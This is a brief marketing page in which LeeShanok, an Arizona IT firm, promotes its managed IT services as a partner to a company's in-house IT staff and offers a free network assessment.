Managed IT services save companies time, money, and headaches on information technology and improve business functions. This is often achieved by working alongside a company’s internal IT department. Many managed service providers will want to displace a one- or two-person internal IT team. LeeShanok instead works very well with internal IT departments and recommends evaluating the business’s technology needs. Generally, for every 75-100 employees, a full-time internal IT contact who is partnered with a managed service provider is recommended.

Our guide to Why IT Managed Services are Important for your Business spells out exactly how and why managed IT services are structured to benefit clients over other forms of IT management.

Explore Managed IT Services for Your Business

LeeShanok has been providing Managed IT Services to Arizona businesses since 1997. See if we’re a good fit for your organization by requesting your complimentary network assessment and consultation below.